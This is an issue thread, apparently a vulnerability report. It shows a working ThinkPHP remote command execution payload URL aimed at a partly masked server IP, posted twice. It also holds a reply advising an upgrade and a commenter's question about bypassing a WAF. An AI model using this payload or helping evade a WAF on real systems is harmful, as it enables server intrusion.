Open CCkiller opened 5 years ago
The RCE(Remote Command Execution) vulnerability is triggered by a http request.Successfully executed the command "whoami". poc: http://58.82.XXX.XXX:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
This is the official vulnerability of ThinkPHP, please upgrade the core framework to the latest version of the official.
hi, Is there a way to bypass the waf? I get a 403 forbidden error.
The RCE(Remote Command Execution) vulnerability is triggered by a http request.Successfully executed the command "whoami". poc: http://58.82.XXX.XXX:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami